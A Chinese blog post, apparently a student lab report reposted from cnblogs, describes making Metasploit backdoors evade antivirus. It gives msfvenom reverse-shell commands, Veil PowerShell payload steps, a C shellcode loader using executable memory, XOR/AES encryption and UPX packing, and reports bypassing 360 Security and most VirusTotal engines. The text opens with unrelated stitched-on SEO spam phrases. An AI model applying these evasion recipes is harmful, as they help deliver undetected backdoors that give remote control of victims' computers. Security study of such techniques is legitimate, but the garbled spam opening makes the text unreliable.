公司做网站可以用个人域名,深圳外贸公司为什么不招人,网站制作怎么做让点击高,郴州网站网站建设杀软原理 目前杀毒软件的原理主要有3种#xff1a; 1.引擎与病毒库的交互作用#xff0c;通过特征码提取与病毒库中的特征码进行比对识别病毒。 2.启发式Heuristic#xff0c;通过程序的一些行为和特征来判断。 3.在虚拟机技术上的启发式#xff0c;通过建立一个虚拟环境运…杀软原理 目前杀毒软件的原理主要有3种 1.引擎与病毒库的交互作用通过特征码提取与病毒库中的特征码进行比对识别病毒。 2.启发式Heuristic通过程序的一些行为和特征来判断。 3.在虚拟机技术上的启发式通过建立一个虚拟环境运行程序对其进行全方位的检测。 了解更多可见“杀毒软件工作原理 及 现在主要杀毒技术”。 免杀原理 免杀就是躲杀软的识别那就从杀软的原理下手。 1.改变特征码 如果你手里只有EXE加壳压缩壳 加密壳 有shellcode(像Meterpreter用encode进行编码基于payload重新编译生成可执行文件 有源代码用其他语言进行重写再编译veil-evasion 2.改变行为 通讯方式 尽量使用反弹式连接即服务端被控制端会主动连接客户端控制端。 使用隧道技术隧道协议将其它协议的数据帧或包重新封装然后通过隧道发送把所有要传送的数据全部封装到合法的报文里进行传送以绕过防火墙。 加密通讯数据 操作模式 基于内存操作像基于特征码的查杀大部分是扫描硬盘上的文件所以可以考虑在用到后门时远程传输放在内存中运行而不是存在硬盘上。但也有部分杀毒软件会扫描内存一般可以采用加入nop指令来躲过查杀。 减少对系统的修改 加入混淆作用的正常功能代码 免杀实践 本人使用的杀软是360安全卫士11版本 将metasploit直接生成的后门上传到virusTotal上通过率是51/66。 msf编码器编码 既然杀软可以通过特征码识别我们的后门那我们就想办法先把后门经过编码使用时再解码这样就把后门的特征码隐藏起来了下面我们利用metasploit自带的编码器试一试效果。 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST192.168.20.136 LPORT443 -f exe met-encoded.exe 将metasploit编码后的后门上传到virusTotal上通过率是50/66。基本没有变化因为shikata_ga_nai总会有解码(decoder stub)部分需要加入的exe中AV厂商只要盯住这部分就可以了尤其是metasploit这么出名的渗透软件。 veil-evasion免杀 安装 1.apt-get直接装不过得换源 2.在github上可以搜到各种版本git clone下来找到其中的setup.sh并运行安装就可以 其实veil的安装网上很多教程这里主要是本人说明一下遇到的错误安装结束后输入veil提示错误 module Tools.Ordnance has no attribute Tool#错误 在老师的指导下只要把/usr/share/veil/Tools/Evasion/evasion_common/shellcode_help.py和/usr/share/veil/Tools/Evasion/Tool.py中的import Tool as Ordnance_Import删掉就可以了 利用veil中的powershell实现后门 sudo进入veil然后按照提示use 1list列出所有可用的payload选中21 powershelluse 21, set LHOST xx.xx.xx.xx, generate 之后会提示生成的文件名输入后显示生成的文件路径/usr/share/veil-output/source下就可以看到我们生成的.bat批处理文件我们把它拷贝到windows下运行就可以连上。 同样也可以利用py源码生成选取python写的payloadkali里面因为没有pyinstaller和py2exe所以先把/usr/share/veil-output/source下的.py文件拷到windows下编译成exe即可 pyinstaller -F -w py_https.py 如果安装了pip可以直接pip install pyinstaller。 最后powershell在virustotal上的通过率是23/56python生成的exe通过率是15/66。而且360都没有扫到这两个后门。 利用shellcode编程实现免杀 msfvenom -p windows/meterpreter/reverse_tcp LHOST192.168.201.136 LPORT1213 -f c 生成shellcode后我们把它拿到visial studio中加以调用就可以运行。 LPVOID Memory VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(Memory, buf, sizeof(buf));((void(*)())Memory)(); buf就是上面生成的那堆十六进制的shellcode上面的语句首先生成一个没有类型的指针然后我们用memcpy将shellcode拷贝到改指针对应的内存下最后以函数调用这个内存地址就成功让我们的shellcode运行起来了。运行后在虚拟机端可以连接到win10主机不过这样还没法躲过查杀会直接被360查杀。在virusTotal上的通过率也只有24/66。 猜测肯定是AV厂商也都知道把metasploit生成的这些shellcode当做特征码那就加密一波先用0xff对原shellcode进行异或。通过率提高到了16/66。 之后换了aes加密发现效果并不是很好只有14/66然后试着把上面几行调用语句去掉也就是不调用我们的shellcode也会被13个杀软检测出来。然后就很纳闷到底是哪里出了问题让杀软杀出来了不知道是有内存查杀还是什么其他方法识别的。 先不管那么多试着结合其他方法再测试一次用upx对上面的aes加密的shellcode程序实施加壳 upx source.exe -o dest.exe#source源文件名,dest生成文件名 没想到效果还可以只有6个可以扫出来了如下图。 然后用360扫描是扫不出来的之后打开进行运行测试连接两三次360依然没有反应。看来是成功绕过360的防护了。 下面是虚拟机上连接win10的截图 可以看到我们在msf里面连接上靶机后执行ps查看运行程序并且可以看到360安全卫士此时是打开的。 实验体会 这次实验是能让上次实验变得有意义的实验只有免杀后门才有使用性也让我很激动不过事实总是不尽人意不得不说这次实验备受打击从下午一直做到晚上一直尝试新办法一直被360查杀直到最后要放弃了试了一下看上去最没用的upx加壳竟然成功绕过了360。这也给我一些经验做免杀要从不同方面入手才行因为我们可以给shellcode加密可以加壳等等这些都是可以嵌套的而杀软看上去并不擅长的一层一层剥开我们的壳所以用不同的壳来包装shellcode也不失为一种好办法。 此次实验中没有用到veil-evasion实为无奈先用apt-get安装了一遍报错没有module tools于是我就pip install tools一下可是又报错如下又去github clone了一份又报错一样的错都卡在了 module Tools.Ordnance has no attribute Tool#错误 而每次安装都要等好久所以没有尝试再安装一次直接用shellcodevisal studio做了。一开始我把shellcode做异或后发现有明显的效果所以就惯性思维的认为只要换个好一点的加密就可以免杀于是又用了aes可惜效果不尽人意。我试着分析其中原因可以没能找到不过我认为首先加密之后的数据是不可能被杀软所知道也就是硬盘上加密后的shellcode不可能成为被查杀的特征值然后加密算法我也写过都没有被误判成木马所以应该也不是通过加密算法来识别。我怀疑过是函数调用毕竟一般情况下很少把其他类型的数据拿来做函数调用的不过我注释掉调用那部分再编译上传检测通过率基本不变还是14。这样我就不知道到底我的后门是哪里出了问题被杀出来当时也在这纠缠了好久后来又想试试是不是在内存中被查杀的试着把机器码转汇编在里面加nop不过没学过汇编是在进行不下去改了几个之后通过率还是提高了一个的不过依然被360杀了而且根据后面加壳可以正常运行说明360也不是内存查杀的到底360是如何查杀我自己写的shellcode加壳程序的希望有知道原因的大佬能够给我一些提示必有重谢 转载于:https://www.cnblogs.com/guoyicai/p/8727202.html
